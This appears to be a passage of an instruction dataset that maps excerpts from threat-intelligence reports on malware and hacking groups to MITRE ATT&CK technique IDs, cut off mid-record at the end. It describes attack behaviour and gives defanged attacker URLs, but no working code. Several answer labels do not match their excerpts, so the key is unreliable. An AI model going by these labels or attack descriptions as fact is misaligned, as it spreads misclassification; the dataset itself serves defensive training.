{ + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This variant has exactly the same features as the previous variant: file listing, OS version getting, process killing, drive listing, execution via ShellExecuteW(), execution via named pipe, cleaning, file removal, file downloading. Here is an example of code similarities on the execution via named pipe function. On the left a sample from Bisonal 2014 and on the right Bisonal 2011", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Despite the simplicity of most of their tools, the Gamaredon group also is capable of deploying some novelty, such as their Outlook VBA module. However, as it is far from stealthy, in the long run it is no match for a capable organization. The variety of tools Gamaredon has at its disposal can be very effective at fingerprinting a machine and understanding what sensitive data is available, then spreading throughout the network", + "output": "- T1025: Data from Removable Media" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Check for blocklisted usernames and computernames: The implant concatenates the username and computer it acquires from the infected endpoint's environment variables. This string is then checked against a list of blocklisted values to determine if the implant should continue execution or exit out. Check for blocklisted process names: The following process names are blocklisted and if found running on the system, the RAT implant will simply exit. The blocklist consists of processes belonging to Virtual Machine software (such as VMWare) and analysis tools (such as ProcessHacker etc", + "output": "- T1497.001: Virtualization/Sandbox Evasion - System Checks\n- T1082: System Information Discovery\n- T1033: System Owner/User Discovery\n- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It also creates a unique system specific identifier that it will use during the C2 communications to send and receive messages. The system specific identifier is a 16 character string that the Trojan creates using the serial number of the C volume and the first 4 hexadecimal bytes from Environment.UserName", + "output": "- T1071.003: Application Layer Protocol - Mail Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This document uses KernelCallbackTable as well to hijack the control flow just like our first module, the injection technique used by the shellcode also resembles the first document. The major difference in this document is that it tries to retrieve a remote HTML page and then executes it using mshta.exe. The remote HTML page is located at https[:]//markettrendingcenter[.]com/member.htm and throws a 404 Not Found which makes it difficult for us to analyze this document any further", + "output": "- T1218.005: System Binary Proxy Execution - Mshta" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "2) Download the OpenSSL library. Instead of saving the downloaded file, QakBot measures the download speed and deletes the received file", + "output": "- T1016.001: System Network Configuration Discovery - Internet Connection Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This script is executed and is used to decode a static base64 string within the strEncode variable. Using base64 encoding the decoded binary is stored as HncModuleUpdate.exe and is then executed. This specific resource contains malicious shellcode used by the malware. These execution steps allow the launch of the new ROKRAT variant by decoding the PE binary and injecting into the cmd.exe process", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The malicious attachment was a simple PE file (SHA256: 5f001f3387ddfc0314446d0c950da2cec4c786e2374d42beb3acce6883bb4e63) with the filename <redacted> Technical Services.exe. Its sole purpose here is to install the QUADAGENT backdoor and execute it. Once the victim downloads and executes the email attachment, it runs silently with no additional decoy documents or decoy dialog boxes. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails", + "output": "- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "From our analysis, stealing keystrokes is the main function of RunningRat; however, the DLL has code for more extensive functionality. Code is included to copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and much more. However, our current analysis shows no way for such code to be executed", + "output": "- T1070.001: Indicator Removal - Clear Windows Event Logs\n- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BackdoorDiplomacy is a group that primarily targets diplomatic organizations in the Middle East and Africa, and less frequently, telecommunication companies. Their initial attack methodology is focused on exploiting vulnerable internet-exposed applications on webservers, in order to drop and execute a webshell. Post compromise, via the webshell, BackdoorDiplomacy deploys open-source software for reconnaissance and information gathering, and favors the use of DLL search order hijacking to install its backdoor, Turian. Finally, BackdoorDiplomacy employs a separate executable to detect removable media, likely USB flash drives, and copy their contents to the main drive\u2019s recycle bin", + "output": "- T1574.001: Hijack Execution Flow - DLL Search Order Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It will use an auto-run registry (HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run) named AdobeMX that will execute PowerShell to load the encoded executable via reflective loading (loading an executable from memory rather than from the system\u2019s disks", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Change file owner and group. This utility is used by malware to change the user ID and/or the group ID of the specified files. This can lock other users\u2019 out of access to the file, thus hampering removal or inspection. It may also be required in order to execute a file in certain, elevated context", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The iContact binary appears to be a backdoor that gathers user and locale data and engages in encrypted communications with a C2 server over TCP. Functionality includes sending and receiving files and running custom commands such as scanning a directory and deleting files", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Overview of discovered Ramsay versions . Malicious documents dropping Ramsay version 1 . This attack vector consists of malicious documents exploiting CVE-2017-0199 intended to drop an older version of Ramsay. Based on the low complexity of the Ramsay agent delivered, the threat actors may be embedding this specific instance within these malicious documents for evaluation purposes. Even though affected documents will be modified, it won\u2019t impact their integrity; each affected Word document remains fully operational after artifact appending has taken place. First, Ramsay looks for Word documents and also, in more recent versions, for PDFs and ZIP archives: Figure 13. Hex-Rays output of spreader scanning routines . It is important to notice that there is a correlation between the target drives Ramsay scans for propagation and control document retrieval. File structure changes during an infection and execution . All of the different artifacts involved in the infection stage are either within the context of the spreader or dropped previously by another Ramsay component. This information will be contained within all logged information Ramsay collects and may be leveraged by operators in order to do further lateral movement over the network in a later stage via a different channel. Some of Ramsay and Retro filename convention . Is important to highlight that among Retro\u2019s documented techniques, it leverages malicious instances of msfte.dll, oci.dll and lame_enc.dll, and via Phantom DLL Hijacking. As previously documented, Ramsay also uses this technique in some of its versions also using msfte.dll and oci.dll. Finally, we noticed Korean language metadata within the malicious documents leveraged by Ramsay, denoting the use of Korean-based templates", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When G-Data published on Turla/Uroburos back in February, several questions remained unanswered. One big unknown was the infection vector for Turla (aka Snake or Uroburos). Our analysis indicates that victims are infected via a sophisticated multi-stage attack, which begins with the Epic Turla. In time, as the attackers gain confidence, this is upgraded to more sophisticated backdoors, such as the Carbon/Cobra system. Sometimes, both backdoors are run in tandem, and used to \u201crescue\u201d each other if communications are lost with one of the backdoors", + "output": "- T1049: System Network Connections Discovery\n- T1018: Remote System Discovery\n- T1124: System Time Discovery\n- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Thursday, April 16, 2020 . PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors . News summary . - Azerbaijan government and energy sector likely targeted by an unknown actor. For exfiltration, it uses FTP, which denotes an intention to transfer large amounts of data. Afterward, it copies 7,074,638 bytes from the end of the file and writes the remaining bytes back to the disk. One, called \"\"frown.py,\"\" is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143. For each FTP usage, the credentials are provided by the C2 server during the request. Start routine The communication between the scripts is done via a file called \"\"Abibliophobia23\"\" Commands and results are written into the file using a custom encryption scheme. The binary uses a file system watcher in order to generate an event each time a file is modified in one of the directories in the \"\"Paths\"\" variable of the configuration file. Filesystem monitoring routine Once a file is available, the Dog.exe binary exfiltrates it, using email or FTP depending on the configuration. Additional tools . During our investigation, we identified a couple of additional tools mainly in Python and compiled for Windows: - Klog.exe: A keylogger using an output file called \"\"System32.Log. Tre.py\"\": A script used to create the file with the files/directories tree\"", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This is an application document that has been used to provide a decoy to the Bisonal malware. This conference has some high-ranking government and business attendees. In 2019, a Russian RTF document \u2014 \u0441\u0443\u0434\u0430\u043b\u0433\u0430\u0430.doc (research.doc) \u2014 was used with an exploit to drop the winhelp.wll file, which contains Bisonal. Based on our research and the released paper mentioned above, the Bisonal malware is part of the Tonto Team arsenal. Tonto Team was mentioned in the media in 2017 as one of the actors who targeted South Korea, when the country announced it would deploy a Terminal High-Altitude Air Defense (THAAD) in response to North Korean missile tests. At this time, researchers connected the Tonto Team to China", + "output": "- T1203: Exploitation for Client Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Various scans and queries are used to find proxy settings, domain controllers, remote desktop services, Citrix services, and network shares. If the obtained valid account is already member of the domain admins group, the first lateral move in the network is usually to a domain controller where the adversary also deploys a Cobalt Strike beacon. Otherwise, a jump host or other system likely used by domain admins is found and equipped with a Cobalt Strike beacon. If the victim\u2019s network contains other Windows domains or different network security zones, the adversary scans and finds the trust relationships and jump hosts, attempting to move into the other domains and security zones", + "output": "- T1021.002: Remote Services - SMB/Windows Admin Shares\n- T1018: Remote System Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The first of FIN7's new tools is BOOSTWRITE \u2013 an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. One of the analyzed BOOSTWRITE variants contained two payloads: CARBANAK and RDFSNIFFER. While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators", + "output": "- T1553.002: Subvert Trust Controls - Code Signing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TA505 has also recently used LOLbins and legitimate Windows OS processes to perform malicious activities and deliver a payload without being detected. As the entry point of an attack, it delivers a sophisticated email containing a malicious Excel or Word file", + "output": "- T1566.002: Phishing - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "No exploits were used, so the victim would have to manually execute the malware dropper, which pretends to be an Adobe Flash installer. However, our analysis confirmed that Bad Rabbit uses the EternalRomance exploit as an infection vector to spread within corporate networks", + "output": "- T1204.002: User Execution - Malicious File\n- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The formula uses a command prompt to run a PowerShell script that attempts to download and execute a second PowerShell script hosted at the URL hxxp://micrrosoft[.]net/winupdate.ps1. By default, Excel will not launch the command prompt application, but will do so with the user\u2019s consent via the following dialog box in Figure 3", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "the malicious DLL installed as a Print Processor) is stored as a file on disk; the modules are stored in the registry by the installer (from the CrLnc.dat file) and are described in Table 6", + "output": "- T1547.012: Boot or Logon Autostart Execution - Print Processors" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Then, it drops C:\\Users\\Public\\x.vbs. Then it drops, C:\\Users\\Public\\Natso.bat. Then, it executes `Natso.bat`, which is a \"\"fileless\"\" UAC bypass found by James Forshaw. If C:\\Windows\\Finex still doesn't exist (which means the UAC bypass failed), it will update the Nasto.bat and execute it using the code shown below. This is another UAC bypass technique based on fodhelper.exe. On our test machine, the last bypass was successful, and `C:\\Windows\\Finex` was successfully created. After that, the DLL deletes the dropped file and exits\"", + "output": "- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable", + "output": "- T1574.007: Hijack Execution Flow - Path Interception by PATH Environment Variable" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As covered above, the attacker dropped two files: Chaos and Client. Chaos is the backdoor that enables the reverse-shell and Client is needed to initiate the connect-back from chaos", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography\n- T1059.004: Command and Scripting Interpreter - Unix Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Turla has many names in the information security industry \u2014 it is also known as Snake, Venomous Bear, Uroburos and WhiteBear. Turla\u00a0likes to use compromised web servers and hijacked satellite connections for their command and control (C2) infrastructure. In some operations, they also do not directly communicate to the C2 server. Instead, they use a compromised system inside the targeted network as a proxy, which forwards the traffic to the real C2 server. Well-known malware like Crutch or Kazuar are attributed to Turla. Lately, we have also seen research that has shown potential links between the Sunburst backdoor and Turla. Not every campaign run by Turla can clearly be attributed to them", + "output": "- T1584.004: Compromise Infrastructure - Server" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Something that makes Kobalos unique is the fact that the code for running a C&C server is in Kobalos itself. Any server compromised by Kobalos can be turned into a C&C server by the operators sending a single command. As the C&C server IP addresses and ports are hardcoded into the executable, the operators can then generate new Kobalos samples that use this new C&C server", + "output": "- T1059.004: Command and Scripting Interpreter - Unix Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Whenever winword makes any graphical call, the shellcode executes. This technique to hijack control flow has also been used by other sophisticated attackers such as FinFisher. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap", + "output": "- T1574.013: Hijack Execution Flow - KernelCallbackTable\n- T1620: Reflective Code Loading\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"X-Session: 0\"\"). Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell. DLL side loading is often used to maintain persistence on the compromised system. Its presence on a compromised system allows a threat actor to spawn a reverse shell, upload or download files, and capture keystrokes. Antivirus detection for HttpBrowser is extremely low and is typically based upon heuristic signatures. DLL side loading has been used to maintain persistence on the compromised system. More information about HttpBrowser is available in Appendix B. HttpBrowser URI. Source: Dell SecureWorks) - ChinaChopper web shell \u2014 A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system. ChinaChopper web shell. shown in Figure 4, are required to interact with the web shell\"", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This specific module appears to have been put together from public sources with some added functionality from the attackers. Perhaps the most interesting part here is the unusual command and control mechanism based on TCP/UDP packets, as well as the C&C hostname\u00a0which fits previously known Turla activity", + "output": "- T1205: Traffic Signaling" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "More interesting however is it that it also contains support for windows execution via smb shares and IPC. The sample also has a Windows version of the malware embedded inside that it can install on remote windows shares and then execute as a service", + "output": "- T1021.002: Remote Services - SMB/Windows Admin Shares" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cobalt is one of the most notorious cybercrime operations, with attacks against more than 100 banks across 40 countries attributed to the group. Morphisec Labs believes that the Cobalt Group split following the arrest of one of its top leaders in Spain in March of 2018. While Cobalt Gang 1.0 uses ThreadKit extensively, Cobalt 2.0 adds sophistication to its delivery method, borrowing some of the network infrastructures used by both APT28 (aka Fancy Bear) and MuddyWater. One of the Cobalt 2.0 Group\u2019s latest campaigns, an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor, was investigated and presented by the Talos research team. Cobalt Group Technical Details . Stage 1 - Word Macro + Whitelisting Bypass . As with many other campaigns, the victim received a document with malicious macro visual basic code. Although the code is heavily obfuscated, the entry point is easily identifiable. The VB code is executed starting from the Frame1_Layout function \u2013 this method is used much less frequently than the obvious Document_Open or the AutoOpen. Such a combination of registry manipulation was reported a year ago as part of an attack campaign executed by the Cobalt Group against Ukrainian banks. As part of the last execution step of the dll, the malicious code writes a JavaScript scriptlet into the Roaming directory and then it executes CreateProcess on the regsvr32 as described by the UserInitMprLogonScript. Organizations should expect to see much more coming from all Cobalt Group factions during the next year", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Establish persistence for itself on the endpoint - Establish persistence of another component of the 